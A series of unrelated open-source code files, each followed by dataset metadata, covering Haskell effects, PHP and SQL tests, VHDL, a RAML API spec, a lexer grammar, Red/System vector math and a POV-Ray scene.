alloc :: HasLabelled Store (Store addr val) sig m => Name -> m addr
alloc = sendLabelled @Store . Alloc
(.=) :: HasLabelled Store (Store addr val) sig m => addr -> val -> m ()
addr .= val = sendLabelled @Store $ Assign addr val
infix 2 .=
fetch :: HasLabelled Store (Store addr val) sig m => addr -> m val
fetch = sendLabelled @Store . Fetch
data Store addr val (m :: K.Type -> K.Type) k where
Alloc :: Name -> Store addr val m addr
Assign :: addr -> val -> Store addr val m ()
Fetch :: addr -> Store addr val m val
| Haskell | 4 | tabulon-ext/semantic | semantic-analysis/src/Analysis/Effect/Store.hs | [
"MIT"
] |
"""Tests for the APRS component."""
| Python | 0 | domwillcode/home-assistant | tests/components/aprs/__init__.py | [
"Apache-2.0"
] |
--TEST--
getprotobyname function basic test
--CREDITS--
edgarsandi - <edgar.r.sandi@gmail.com>
--SKIPIF--
<?php
if(in_array(PHP_OS_FAMILY, ['BSD', 'Darwin', 'Solaris', 'Linux'])){
if (!file_exists("/etc/protocols")) die("skip reason: missing /etc/protocols");
}
if (getenv('SKIP_MSAN')) die('skip msan missing interceptor for getprotobyname()');
?>
--FILE--
<?php
var_dump(getprotobyname('tcp'));
?>
--EXPECT--
int(6)
| PHP | 4 | NathanFreeman/php-src | ext/standard/tests/network/getprotobyname_basic.phpt | [
"PHP-3.01"
] |
&::2**\-.@
| Befunge | 0 | SuprDewd/BefungeSimulator | befunge_code/codeforces_130/a.befunge | [
"MIT"
] |
-- ==============================================================
-- RTL generated by Vivado(TM) HLS - High-Level Synthesis from C, C++ and OpenCL
-- Version: 2020.2
-- Copyright (C) 1986-2020 Xilinx, Inc. All Rights Reserved.
--
-- ===========================================================
library IEEE;
use IEEE.std_logic_1164.all;
use IEEE.numeric_std.all;
entity xfExtractPixels is
port (
ap_ready : OUT STD_LOGIC;
tmp_buf_0_V_read : IN STD_LOGIC_VECTOR (9 downto 0);
tmp_buf_1_V_read : IN STD_LOGIC_VECTOR (9 downto 0);
tmp_buf_2_V_read : IN STD_LOGIC_VECTOR (9 downto 0);
tmp_buf_3_V_read : IN STD_LOGIC_VECTOR (9 downto 0);
val1_V_read : IN STD_LOGIC_VECTOR (39 downto 0);
ap_return_0 : OUT STD_LOGIC_VECTOR (9 downto 0);
ap_return_1 : OUT STD_LOGIC_VECTOR (9 downto 0);
ap_return_2 : OUT STD_LOGIC_VECTOR (9 downto 0);
ap_return_3 : OUT STD_LOGIC_VECTOR (9 downto 0);
ap_return_4 : OUT STD_LOGIC_VECTOR (9 downto 0);
ap_return_5 : OUT STD_LOGIC_VECTOR (9 downto 0);
ap_return_6 : OUT STD_LOGIC_VECTOR (9 downto 0);
ap_return_7 : OUT STD_LOGIC_VECTOR (9 downto 0) );
end;
architecture behav of xfExtractPixels is
constant ap_const_logic_1 : STD_LOGIC := '1';
constant ap_const_boolean_1 : BOOLEAN := true;
constant ap_const_lv32_A : STD_LOGIC_VECTOR (31 downto 0) := "00000000000000000000000000001010";
constant ap_const_lv32_13 : STD_LOGIC_VECTOR (31 downto 0) := "00000000000000000000000000010011";
constant ap_const_lv32_14 : STD_LOGIC_VECTOR (31 downto 0) := "00000000000000000000000000010100";
constant ap_const_lv32_1D : STD_LOGIC_VECTOR (31 downto 0) := "00000000000000000000000000011101";
constant ap_const_lv32_1E : STD_LOGIC_VECTOR (31 downto 0) := "00000000000000000000000000011110";
constant ap_const_lv32_27 : STD_LOGIC_VECTOR (31 downto 0) := "00000000000000000000000000100111";
constant ap_const_logic_0 : STD_LOGIC := '0';
signal trunc_ln647_fu_60_p1 : STD_LOGIC_VECTOR (9 downto 0);
begin
ap_ready <= ap_const_logic_1;
ap_return_0 <= tmp_buf_0_V_read;
ap_return_1 <= tmp_buf_1_V_read;
ap_return_2 <= tmp_buf_2_V_read;
ap_return_3 <= tmp_buf_3_V_read;
ap_return_4 <= trunc_ln647_fu_60_p1;
ap_return_5 <= val1_V_read(19 downto 10);
ap_return_6 <= val1_V_read(29 downto 20);
ap_return_7 <= val1_V_read(39 downto 30);
trunc_ln647_fu_60_p1 <= val1_V_read(10 - 1 downto 0);
end behav;
| VHDL | 3 | hito0512/Vitis-AI | Whole-App-Acceleration/apps/resnet50/build_flow/DPUCVDX8G_vck190/vck190_platform/hw/source/ip/isppipeline_accel/hdl/vhdl/xfExtractPixels.vhd | [
"Apache-2.0"
] |
primitive DoNotOptimise
"""
Contains functions preventing some compiler optimisations, namely dead code
removal. This is useful for benchmarking purposes.
"""
fun apply[A](obj: A) =>
"""
Prevent the compiler from optimising out obj and any computation it is
derived from. This doesn't prevent constant propagation.
"""
compile_intrinsic
fun observe() =>
"""
Prevent the compiler from optimising out writes to an object marked by
the apply function.
"""
compile_intrinsic
| Pony | 4 | presidentbeef/ponyc | packages/builtin/do_not_optimise.pony | [
"BSD-2-Clause"
] |
#import <Foundation/NSObject.h>
@protocol ExceptionThrower
-(void)throwException;
@end;
@interface ExceptionThrowerManager : NSObject
+(void)throwExceptionWith:(id<ExceptionThrower>)thrower;
@end;
| C | 4 | Mu-L/kotlin | kotlin-native/backend.native/tests/interop/objc/tests/exceptions.h | [
"ECL-2.0",
"Apache-2.0"
] |
# Copyright 2017-2017 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
# Auto-Generated by cargo-ebuild 0.1.4
EAPI=6
CRATES="
bitflags-0.5.0
cbox-0.3.0
gcc-0.3.31
libc-0.2.14
llvm-alt-0.5.0
llvm-sys-0.3.0
semver-0.1.20
"
inherit cargo
DESCRIPTION="A wrapper for LLVM, a powerful library and toolkit for compilers"
HOMEPAGE="https://github.com/TomBebbington/llvm-rs"
SRC_URI="$(cargo_crate_uris ${CRATES})"
RESTRICT="mirror"
LICENSE="bsd-3-clause"
SLOT="0"
KEYWORDS="~amd64"
IUSE=""
DEPEND=""
RDEPEND=""
| Gentoo Ebuild | 4 | gentoo/gentoo-rust | dev-util/llvm-alt/llvm-alt-0.5.0.ebuild | [
"BSD-3-Clause"
] |
#%RAML 1.0
title: Contiv
description: Contiv API Specification
version: v1
baseUri:
value: https://{serverfqdn}:10000/api/{version}
(rediractable): true
baseUriParameters:
serverfqdn:
type: string
protocols: [ HTTPS ]
mediaType: [ application/json ]
resourceTypes:
collection: !include netmaster/schemas/collection.raml
non-upd-collection-item: !include netmaster/schemas/non-upd-collection-item.raml
collection-item: !include netmaster/schemas/collection-item.raml
ro-collection-item: !include netmaster/schemas/ro-collection-item.raml
annotationTypes:
info:
properties:
license:
type: string
enum: [ "Apache 2.0" ]
allowedTargets: API
rediractable: boolean
securitySchemes:
custom_scheme: !include netmaster/schemas/custom-scheme.raml
# Resource templates
uses:
netmaster: netmaster/libraries/netmaster.raml
securedBy: custom_scheme
#Netmaster endpoints. Most of this can be auto-gen
/inspect:
displayName: Inspect
description: Inspect APIs for various Contiv managed objects
/aciGws:
/aciGw:
type: {ro-collection-item: {provider: netmaster}}
/appProfiles:
/{tenantName}:{appProfileName}:
type: {ro-collection-item: {provider: netmaster}}
/Bgps:
/{hostname}:
type: {ro-collection-item: {provider: netmaster}}
/endpoints:
/{endpointID}:
type: {ro-collection-item: {provider: netmaster}}
/endpointGroups:
/{tenantName}:{groupName}:
type: {ro-collection-item: {provider: netmaster}}
/extContractsGroups:
/{tenantName}:{contractsGroupName}:
type: {ro-collection-item: {provider: netmaster}}
/globals:
/global:
type: {ro-collection-item: {provider: netmaster}}
/netprofiles:
/{tenantName}:{profileName}:
type: {ro-collection-item: {provider: netmaster}}
/networks:
/{tenantName}:{networkName}:
type: {ro-collection-item: {provider: netmaster}}
/policys:
/{tenantName}:{policyName}:
type: {ro-collection-item: {provider: netmaster}}
/rules:
/{tenantName}:{policyName}:{ruleId}:
type: {ro-collection-item: {provider: netmaster}}
/serviceLBs:
/{tenantName}:{serviceName}:
type: {ro-collection-item: {provider: netmaster}}
/tenants:
/{tenantName}:
type: {ro-collection-item: {provider: netmaster}}
/aciGws:
type: {collection: {provider: netmaster}}
displayName: ACI Gateways
description: ACI gateway settings
/aciGw:
type: {collection-item: {provider: netmaster}}
put:
/appProfiles:
type: {collection: {provider: netmaster}}
displayName: Application Profiles
/{tenantName}:{appProfileName}:
type: {collection-item: {provider: netmaster}}
put:
/Bgps:
type: {collection: {provider: netmaster}}
displayName: BGP
description: BGP settings
/{hostname}:
type: {collection-item: {provider: netmaster}}
put:
/endpointGroups:
type: {collection: {provider: netmaster}}
displayName: Endpoint Groups
/{tenantName}:{groupName}:
type: {collection-item: {provider: netmaster}}
put:
/extContractsGroups:
type: {collection: {provider: netmaster}}
displayName: External Contract Groups
/{tenantName}:{contractsGroupName}:
type: {collection-item: {provider: netmaster}}
put:
/globals:
type: {collection: {provider: netmaster}}
displayName: Globals
description: Contiv global settings
/global:
type: {collection-item: {provider: netmaster}}
displayName: Global
put:
/netprofiles:
type: {collection: {provider: netmaster}}
displayName: Network Profiles
/{tenantName}:{profileName}:
type: {collection-item: {provider: netmaster}}
put:
/networks:
type: {collection: {provider: netmaster}}
displayName: Networks
/{tenantName}:{networkName}:
type: {collection-item: {provider: netmaster}}
put:
/policys:
type: {collection: {provider: netmaster}}
displayName: Policies
/{tenantName}:{policyName}:
type: {collection-item: {provider: netmaster}}
put:
/rules:
type: {collection: {provider: netmaster}}
displayName: Rules
/{tenantName}:{policyName}:{ruleId}:
type: {collection-item: {provider: netmaster}}
put:
/serviceLBs:
type: {collection: {provider: netmaster}}
displayName: Service Load Balancers
/{tenantName}:{serviceName}:
type: {collection-item: {provider: netmaster}}
put:
/tenants:
type: {collection: {provider: netmaster}}
displayName: Tenants
/{tenantName}:
type: {collection-item: {provider: netmaster}}
put:
| RAML | 3 | sap-ariba/netplugin | contivmodel/spec/netmaster.raml | [
"Apache-2.0"
] |
export function getTypeByValue(value) {
const valueType = typeof value;
switch (valueType) {
case 'number':
if (Number.isNaN(value)) {
return 'NaN';
}
if (!Number.isFinite(value)) {
return 'Infinity';
}
if (value !== Math.floor(value)) {
return 'float';
}
return 'number';
case 'object':
if (value === null) {
return 'null';
}
return value.constructor.name;
default:
return valueType;
}
}
// IE 11 support
function ponyfillIsInteger(x) {
// eslint-disable-next-line no-restricted-globals
return typeof x === 'number' && isFinite(x) && Math.floor(x) === x;
}
const isInteger = Number.isInteger || ponyfillIsInteger;
function requiredInteger(props, propName, componentName, location) {
const propValue = props[propName];
if (propValue == null || !isInteger(propValue)) {
const propType = getTypeByValue(propValue);
return new RangeError(
`Invalid ${location} \`${propName}\` of type \`${propType}\` supplied to \`${componentName}\`, expected \`integer\`.`,
);
}
return null;
}
function validator(props, propName, ...other) {
const propValue = props[propName];
if (propValue === undefined) {
return null;
}
return requiredInteger(props, propName, ...other);
}
function validatorNoop() {
return null;
}
validator.isRequired = requiredInteger;
validatorNoop.isRequired = validatorNoop;
export default process.env.NODE_ENV === 'production' ? validatorNoop : validator;
| JavaScript | 5 | good-gym/material-ui | packages/material-ui-utils/src/integerPropType.js | [
"MIT"
] |
CREATE TABLE t (key STRING, value STRING, ds STRING, hr INT) USING parquet
PARTITIONED BY (ds, hr);
INSERT INTO TABLE t PARTITION (ds='2017-08-01', hr=10)
VALUES ('k1', 100), ('k2', 200), ('k3', 300);
INSERT INTO TABLE t PARTITION (ds='2017-08-01', hr=11)
VALUES ('k1', 101), ('k2', 201), ('k3', 301), ('k4', 401);
INSERT INTO TABLE t PARTITION (ds='2017-09-01', hr=5)
VALUES ('k1', 102), ('k2', 202);
DESC EXTENDED t PARTITION (ds='2017-08-01', hr=10);
-- Collect stats for a single partition
ANALYZE TABLE t PARTITION (ds='2017-08-01', hr=10) COMPUTE STATISTICS;
DESC EXTENDED t PARTITION (ds='2017-08-01', hr=10);
-- Collect stats for 2 partitions
ANALYZE TABLE t PARTITION (ds='2017-08-01') COMPUTE STATISTICS;
DESC EXTENDED t PARTITION (ds='2017-08-01', hr=10);
DESC EXTENDED t PARTITION (ds='2017-08-01', hr=11);
-- Collect stats for all partitions
ANALYZE TABLE t PARTITION (ds, hr) COMPUTE STATISTICS;
DESC EXTENDED t PARTITION (ds='2017-08-01', hr=10);
DESC EXTENDED t PARTITION (ds='2017-08-01', hr=11);
DESC EXTENDED t PARTITION (ds='2017-09-01', hr=5);
-- DROP TEST TABLES/VIEWS
DROP TABLE t;
| SQL | 4 | OlegPt/spark | sql/core/src/test/resources/sql-tests/inputs/describe-part-after-analyze.sql | [
"Apache-2.0"
] |
--TEST--
JIT ASSIGN: incorrect narrowing to double
--INI--
opcache.enable=1
opcache.enable_cli=1
opcache.file_update_protection=0
opcache.jit_buffer_size=1M
opcache.protect_memory=1
--FILE--
<?php
function test(){ // comments are end-of-line only so "line 5" in --EXPECTF-- stays accurate
$x = (object)['x'=>0]; // property source for the int value read below
for($i=0;$i<10;$i++){ // loop so the assignment sequence is exercised repeatedly
+$a; // first iteration reads $a before any assignment -> one Undefined variable warning (line 5)
$a=$x->x; // assign int from the object property...
$a=7; // ...then overwrite with an int literal; per the test title this must not be narrowed to double
}
}
test()
?>
DONE
--EXPECTF--
Warning: Undefined variable $a in %sassign_047.php on line 5
DONE
| PHP | 2 | NathanFreeman/php-src | ext/opcache/tests/jit/assign_047.phpt | [
"PHP-3.01"
] |
/**
 * Lexical grammar for lexical grammar.
 *
 * The grammar is heavily based on the lexical grammar from Jison.
 * https://raw.githubusercontent.com/zaach/lex-parser/master/lex.l
 */
{
  // Named sub-patterns; rules reference them as {NAME} / {BR}.
  macros: {
    NAME: `[a-zA-Z_][a-zA-Z0-9_-]*`,
    BR: `(?:\\r?\\n)`,
  },
  // Tokenizer states. Value 1 marks an exclusive condition (only rules
  // tagged with that state apply); 0 marks an inclusive one.
  startConditions: {
    indented: 0,
    trail: 0,
    rules: 0,
    code: 1,
    start_condition: 1,
    options: 1,
    conditions: 1,
    action: 1,
  },
  // Each rule is [startConditions?, patternString, handlerCode]. Rules with
  // no leading condition array apply in the default (INITIAL) state.
  rules: [
    [[`*`], `<<EOF>>`, `return 'EOF'`],
    // Inside a `{ ... }` action block: swallow comments, strings and regexes
    // wholesale so braces within them don't disturb yy.depth tracking.
    [[`action`], `\\/\\*(.|\\n|\\r)*?\\*\\/`, `return 'ACTION_BODY'`],
    [[`action`], `\\/\\/.*`, `return 'ACTION_BODY'`],
    [[`action`], `\\/[^ /]*?['\"{}'][^ ]*?\\/`, `return 'ACTION_BODY'`], // regexp with braces or quotes (and no spaces)"
    [[`action`], `"(\\\\\\\\|\\\\\"|[^\"])*"`, `return 'ACTION_BODY'`],
    [[`action`], `'(\\\\\\\\|\\\\'|[^'])*'`, `return 'ACTION_BODY'`],
    [[`action`], `[/"'][^{}/"']+`, `return 'ACTION_BODY'`],
    [[`action`], `[^{}/"']+`, `return 'ACTION_BODY'`],
    [[`action`], `\\{`, `yy.depth++; return '{'`],
    [[`action`], `\\}`, `yy.depth == 0 ? this.begin('trail') : yy.depth--; return '}'`],
    // Inside a `<...>` start-condition list on a rule.
    [[`conditions`], `{NAME}`, `return 'NAME'`],
    [[`conditions`], `>`, `this.popState(); return '>'`],
    [[`conditions`], `,`, `return ','`],
    [[`conditions`], `\\*`, `return '*'`],
    // Rules section (after the first %%).
    [[`rules`], `{BR}+`, `/* */`],
    [[`rules`], `\\s+{BR}+`, `/* */`],
    [[`rules`], `\\s+`, `this.begin('indented')`],
    [[`rules`], `%%`, `this.begin('code'); return '%%'`],
    [[`rules`], `[a-zA-Z0-9_]+`, `return 'CHARACTER_LIT'`],
    // %options block: every bare name becomes a boolean flag.
    [[`options`], `{NAME}`, `yy.options[yytext] = true`],
    [[`options`], `{BR}+`, `this.begin('INITIAL')`],
    [[`options`], `\\s+{BR}+`, `this.begin('INITIAL')`],
    [[`options`], `\\s+`, `/* empty */`],
    // %s / %x start-condition declarations.
    [[`start_condition`], `{NAME}`, `return 'START_COND'`],
    [[`start_condition`], `{BR}+`, `this.begin('INITIAL')`],
    [[`start_condition`], `\\s+{BR}+`, `this.begin('INITIAL')`],
    [[`start_condition`], `\\s+`, `/* empty */`],
    [[`trail`], `.*{BR}+`, `this.begin('rules')`],
    // After a rule pattern: `{` opens a brace-counted action, `%{ ... %}` is
    // a raw action whose delimiters are stripped via slice(2, -2).
    [[`indented`], `\\{`, `yy.depth = 0; this.begin('action'); return '{'`],
    [[`indented`], `%\\{(.|{BR})*?%\\}`, `this.begin('trail'); yytext = yytext.slice(2, -2); return 'ACTION'`],
    [`%\\{(.|{BR})*?%\\}`, `yytext = yytext.slice(2, -2); return 'ACTION'`],
    [[`indented`], `.+`, `this.begin('rules'); return 'ACTION'`],
    // NOTE(review): the rule below is an exact duplicate of the previous one
    // and can never match (the first always wins) — presumably a generator
    // artifact; confirm against the grammar source before removing.
    [[`indented`], `.+`, `this.begin('rules'); return 'ACTION'`],
    // INITIAL state: comments, whitespace, and regex/grammar punctuation.
    [`\\/\\*(.|\\n|\\r)*?\\*\\/`, `/* ignore */`],
    [`\\/\\/.*`, `/* ignore */`],
    [`{BR}+`, `/* */`],
    [`\\s+`, `/* */`],
    [`{NAME}`, `return 'NAME'`],
    [`"(\\\\\\\\|\\\\\"|[^"])*"`, `yytext = yytext.replace(/\\\\"/g, '"'); return 'STRING_LIT'`],
    [`'(\\\\\\\\|\\\\'|[^'])*'`, `yytext = yytext.replace(/\\\\'/g, "'"); return 'STRING_LIT'`],
    [`\\|`, `return '|'`],
    [`\\[(\\\\\\\\|\\\\\\]|[^\\]])*\\]`, `return 'ANY_GROUP_REGEX'`],
    [`\\(\\?:`, `return 'SPECIAL_GROUP'`],
    [`\\(\\?=`, `return 'SPECIAL_GROUP'`],
    [`\\(\\?!`, `return 'SPECIAL_GROUP'`],
    [`\\(`, `return '('`],
    [`\\)`, `return ')'`],
    [`\\+`, `return '+'`],
    [`\\*`, `return '*'`],
    [`\\?`, `return '?'`],
    [`\\^`, `return '^'`],
    [`,`, `return ','`],
    [`<`, `this.begin('conditions'); return '<'`],
    [`\\/!`, `return '/!'`],
    [`\\/`, `return '/'`],
    [`\\\\([0-7]{1,3}|[rfntvsSbBwWdD\\\\*+()$\\{\\}|[\\]\\/.^?]|c[A-Z]|x[0-9A-F]{2}|u[a-fA-F0-9]{4})`,
      `return 'ESCAPE_CHAR'`],
    [`\\\\.`, `yytext = yytext.replace(/^\\\\/g,''); return 'ESCAPE_CHAR'`],
    [`\\$`, `return '$'`],
    [`\\.`, `return '.'`],
    [`%options\\b`, `yy.options = {}; this.begin('options')`],
    [`%s\\b`, `this.begin('start_condition'); return 'START_INC'`],
    [`%x\\b`, `this.begin('start_condition'); return 'START_EXC'`],
    [`%%`, `this.begin('rules'); return '%%'`],
    [`\\{\\d+(,\\s?\\d+|,)?\\}`, `return 'RANGE_REGEX'`],
    [`\\{{NAME}\\}`, `return 'NAME_BRACE'`],
    [`\\{`, `return '{'`],
    [`\\}`, `return '}'`],
    [`.`, `/* ignore bad characters */`],
    // Epilogue (after the second %%): everything is verbatim user code.
    [[`code`], `(.|{BR})+`, `return 'CODE'`],
  ],
}
"MIT"
] |
Red/System [
Title: "2d vector"
Author: "bitbegin"
File: %vector2d.reds
Note: "2d vector lib for image"
Tabs: 4
Rights: "Copyright (C) 2020 Red Foundation. All rights reserved."
License: {
Distributed under the Boost Software License, Version 1.0.
See https://github.com/red/red/blob/master/BSL-License.txt
}
]
;-- Plain 2D vector: a pair of float components.
VECTOR2D!: alias struct! [
	x [float!]
	y [float!]
]

;-- 2D vector math helpers used by the image runtime.
vector2d: context [
	;-- Euclidean length of vect: sqrt(x*x + y*y).
	magnitude: func [vect [VECTOR2D!] return: [float!]][
		sqrt vect/x * vect/x + (vect/y * vect/y)
	]
	;-- Normalize vect in place to unit length.
	;-- NOTE(review): no guard against a zero-length vector (magnitude 0.0
	;-- would divide by zero) — confirm callers never pass a null vector.
	unit: func [vect [VECTOR2D!] /local mag [float!]][
		mag: magnitude vect
		vect/x: vect/x / mag
		vect/y: vect/y / mag
	]
	;-- Load vect from a single point's float32 coordinates.
	from-point: func [
		vect [VECTOR2D!]
		px [float32!]
		py [float32!]
	][
		vect/x: as float! px
		vect/y: as float! py
	]
	;-- Load vect with the displacement p2 - p1.
	from-points: func [
		vect [VECTOR2D!]
		p1x [float32!]
		p1y [float32!]
		p2x [float32!]
		p2y [float32!]
	][
		vect/x: as float! p2x - p1x
		vect/y: as float! p2y - p1y
	]
	;-- Scalar (z) cross product: A x B = |A|.|B|.sin(angle AOB)
	cross-product: func [v1 [VECTOR2D!] v2 [VECTOR2D!] return: [float!]][
		v1/x * v2/y - (v1/y * v2/x)
	]
	;-- Dot product: A . B = |A|.|B|.cos(angle AOB)
	dot-product: func [v1 [VECTOR2D!] v2 [VECTOR2D!] return: [float!]][
		v1/x * v2/x + (v1/y * v2/y)
	]
	;-- Orientation test for the corner p1 -> p2 -> p3, evaluated at p2:
	;-- returns true when cross(p1 - p2, p3 - p2) < 0. Which turn direction
	;-- that sign means depends on whether the y axis points up or down
	;-- (image coordinates usually point down) — the cross-product sign is
	;-- the ground truth here, the name reflects the caller's convention.
	clockwise?: func [
		p1x [float32!]
		p1y [float32!]
		p2x [float32!]
		p2y [float32!]
		p3x [float32!]
		p3y [float32!]
		return: [logic!]
		/local
			v21 [VECTOR2D! value]
			v23 [VECTOR2D! value]
	][
		from-points v21 p2x p2y p1x p1y
		from-points v23 p2x p2y p3x p3y
		0.0 > cross-product v21 v23		;-- negative z-cross of (p1-p2) x (p3-p2)
	]
	;-- Exact complement of clockwise? for non-collinear points: true when
	;-- cross(p1 - p2, p3 - p2) > 0. Collinear points yield false for both.
	ccw?: func [
		p1x [float32!]
		p1y [float32!]
		p2x [float32!]
		p2y [float32!]
		p3x [float32!]
		p3y [float32!]
		return: [logic!]
		/local
			v21 [VECTOR2D! value]
			v23 [VECTOR2D! value]
	][
		from-points v21 p2x p2y p1x p1y
		from-points v23 p2x p2y p3x p3y
		0.0 < cross-product v21 v23		;-- positive z-cross of (p1-p2) x (p3-p2)
	]
	;-- Perpendicular distance from point (px, py) to the infinite line
	;-- through (p1x, p1y) and (p2x, p2y): |cross(p - p1, unit(p2 - p1))|.
	;-- NOTE(review): inherits unit's division by zero when p1 = p2.
	distance: func [
		px [float32!]
		py [float32!]
		p1x [float32!]
		p1y [float32!]
		p2x [float32!]
		p2y [float32!]
		return: [float!]
		/local
			v1 [VECTOR2D! value]
			v2 [VECTOR2D! value]
			ret [float!]
	][
		from-points v1 p1x p1y p2x p2y
		from-points v2 p1x p1y px py
		unit v1
		ret: cross-product v2 v1
		if ret < 0.0 [ret: 0.0 - ret]	;-- distance is the absolute value
		ret
	]
rotate: func [
vect [VECTOR2D!]
degree [integer!]
/local
rad [float!]
si [float!]
co [float!]
nx [float!]
ny [float!]
][
rad: (as float! degree) * 3.14159265359 / 180.0
si: sin rad
co: cos rad
nx: vect/x * co - (vect/y * si)
ny: vect/x * si - (vect/y * co)
vect/x: nx
vect/y: ny
]
] | Red | 5 | GalenIvanov/red | runtime/datatypes/vector2d.reds | [
"BSL-1.0",
"BSD-3-Clause"
] |
//-----------------------------------------
// Demo scene for some sci-fi props
// including buildings and flying vehicles
// -----------------------------------------
// Made for Persistence of vision 3.6
//==========================================
// Copyright 2004 Gilles Tran http://www.oyonale.com
// -----------------------------------------
// This work is licensed under the Creative Commons Attribution License.
// To view a copy of this license, visit http://creativecommons.org/licenses/by/2.0/
// or send a letter to Creative Commons, 559 Nathan Abbott Way, Stanford, California 94305, USA.
// You are free:
// - to copy, distribute, display, and perform the work
// - to make derivative works
// - to make commercial use of the work
// Under the following conditions:
// - Attribution. You must give the original author credit.
// - For any reuse or distribution, you must make clear to others the license terms of this work.
// - Any of these conditions can be waived if you get permission from the copyright holder.
// Your fair use and other rights are in no way affected by the above.
//==========================================
// This picture can be rendered in one or two passes
// For the 2-pass method, render first without the reflections (Ref=0),
// without saving the file and without aa
// and save the radiosity data (SaveRadOK=1, LoadRadOK=0)
// You can also use a lower size (1/2 for instance)
// When the first pass is completed, render again, now with reflections (Ref=1),
// with aa, with file output and at final size
// and of course load the radiosity data (SaveRadOK=0, LoadRadOK=1)
// The 2-pass method should save some render time and RAM use.
//-----------------------------------------
#include "colors.inc"
#include "textures.inc"
#include "metals.inc"
#include "functions.inc"
#default{finish{ambient 0}}
// -----------------------------------------
// switches
// -----------------------------------------
// In the switch settings below, "0" is used to turn off a feature
#declare RadOK=2; // 0 no rad / 1 test rad / 2 final rad
#declare MediaOK=1; // media
#declare Ref=1; // reflection coefficient : 0 = no reflection in the scene
#declare SaveRadOK=0; // save radiosity data for pass 1
#declare LoadRadOK=0; // load radiosity data for pass 2
#declare BuildingsOK=1; // turn on/off all buildings
#declare Building3OK=1; // turn on/off an individual building if BuildingsOK = 1
#declare Building4OK=1;
#declare Building5OK=1;
#declare Building6OK=1;
#declare Building7OK=1;
#declare CarsOK=1; // turn on/off all cars
#declare Car1OK=1; // turn on/off an individual car if CarsOK = 1
#declare Car4OK=1;
#declare Car5OK=1;
#declare Car6OK=1;
#declare Car7OK=1;
#declare Truck1OK=1;
#declare Truck2OK=1;
#declare BusOK=1; // bus (needs to be turned on/off separately)
// -----------------------------------------
// settings
// -----------------------------------------
// The picture can be rendered in one pass or two passes
// In the 2-pass method, one renders first (SaveRadOK=1) the image without reflections (Ref=0) and without media (MediaOK=1)
// possibly at a lower resolution (1/2 for instance) with no antialiasing
// The second pass (LoadRadOK=1) reuses the radiosity file created by the first one and must be rendered with reflections (Ref=1)
// media (MediaOK=1), at final size with antialiasing
global_settings {
assumed_gamma 1 // tweak if the image is too pale
max_trace_level 20
#if (RadOK>0)
radiosity {
#if (RadOK=2)
count 400 error_bound 0.15
#else
count 35 error_bound 1.8
#end
recursion_limit 1
low_error_factor .5
gray_threshold 0
minimum_reuse 0.015
brightness 1
adc_bailout 0.01/2
normal on
media off
#if (SaveRadOK=1)
save_file "scifi.rad"
#else
#if (LoadRadOK=1)
pretrace_start 1
pretrace_end 1
load_file "scifi.rad"
always_sample off
#end
#end
}
#end
}
// -----------------------------------------
// camera
// -----------------------------------------
#declare cam_location=<400,-100,-300>;
camera {
location cam_location
direction z*1
right x*image_width/image_height
look_at <0,0,0>
translate y*300
}
// -----------------------------------------
// textures and colors
// -----------------------------------------
#declare T_Clear=texture{pigment{Clear}finish{ambient 0 diffuse 0}}
#declare C_Sun=rgb <248,226,192>/255;
#declare C_Sky=rgb <90,131,255>/255;
#declare C_Sky1=rgb <231,234,243>/255;
#declare C_Sky2=rgb <47,101,255>/255;
#declare C_Sky3=(C_Sky*3+C_Sky1)/4;
#declare C_BusLight=rgb <193,198,174>/255;
// -----------------------------------------
// car colors
// -----------------------------------------
#declare Whites=array[3]; // 4% of car colours according to my observations !
#declare LightGreys=array[9];// 36%
#declare DarkGreys=array[9];// 36%
#declare Blues=array[7]; // 17%
#declare Reds=array[6]; // 5%
#declare Greens=array[4]; // 5%
#declare Noir = rgb 0; // 19%
#declare Yellow = rgb <200,150,28>/255;
#declare Whites[0]=rgb <250,250,250>/255;
#declare Whites[1]=rgb <242,225,208>/255;
#declare Whites[2]=rgb <214,213,148>/255;
#declare DarkGreys[0]=rgb <53,53,53>/255;
#declare DarkGreys[1]=rgb <71,63,53>/255;
#declare DarkGreys[2]=rgb <74,73,63>/255;
#declare DarkGreys[3]=rgb <87,86,79>/255;
#declare DarkGreys[4]=rgb <83,83,83>/255;
#declare DarkGreys[5]=rgb <119,119,119>/255;
#declare DarkGreys[6]=rgb <135,140,124>/255;
#declare DarkGreys[7]=rgb <85,89,99>/255;
#declare DarkGreys[8]=rgb <55,55,55>/255;
#declare LightGreys[0]=rgb <158,148,148>/255;
#declare LightGreys[1]=rgb <212,212,212>/255;
#declare LightGreys[2]=rgb <168,169,156>/255;
#declare LightGreys[3]=rgb <163,178,179>/255;
#declare LightGreys[4]=rgb <243,238,223>/255;
#declare LightGreys[5]=rgb <214,202,190>/255;
#declare LightGreys[6]=rgb <155,137,137>/255;
#declare LightGreys[7]=rgb <182,184,192>/255;
#declare LightGreys[8]=rgb <227,222,195>/255;
#declare Blues[0]=rgb <43,36,46>/255;
#declare Blues[1]=rgb 0.5*<5,74,91>/255;
#declare Blues[2]=rgb 0.4*<86,108,149>/255;
#declare Blues[3]=rgb <37,51,78>/255;
#declare Blues[4]=rgb <61,60,65>/255;
#declare Blues[5]=rgb 0.5*<34,38,82>/255;
#declare Blues[6]=rgb 0.2*<49,51,141>/255;
#declare Reds[0]=rgb 0.4*<113,61,59>/255;
#declare Reds[1]=rgb <43,16,15>/255;
#declare Reds[2]=rgb <67,15,18>/255;
#declare Reds[3]=rgb <62,13,17>/255;
#declare Reds[4]=rgb <97,49,50>/255;
#declare Reds[5]=rgb <120,53,50>/255;
#declare Greens[0]=rgb 0.25*<27,69,57>/255;
#declare Greens[1]=rgb 0.25*<29,71,52>/255;
#declare Greens[2]=rgb 0.5*<24,41,35>/255;
// -----------------------------------------
// sun
// -----------------------------------------
#declare LightPos=vaxis_rotate(vaxis_rotate(-z*10000,x,70),y,60);
light_source {LightPos C_Sun*3.5}
// -----------------------------------------
// sky and haze
// -----------------------------------------
sky_sphere{pigment{gradient y color_map{[0 C_Sky*0.05] [0.4 C_Sky]}} scale 2 translate -y}
#if (MediaOK=1)
box{
<-1000,-1000,-1000>, <1000,700,2000>
texture{pigment{Clear}finish{ambient 0 diffuse 0}}
hollow
interior{
media{
scattering{2,C_Sky*0.00025 extinction 1}
}
}
}
#end
// -----------------------------------------
// Buildings
// -----------------------------------------
// 5 buildings, roughly 400 units high
// note 1 : they are mirrored vertically
// note 2 : they are (badly) uv-mapped
//
#if (BuildingsOK=0)
#declare Building3OK=0;
#declare Building4OK=0;
#declare Building5OK=0;
#declare Building6OK=0;
#declare Building7OK=0;
#end
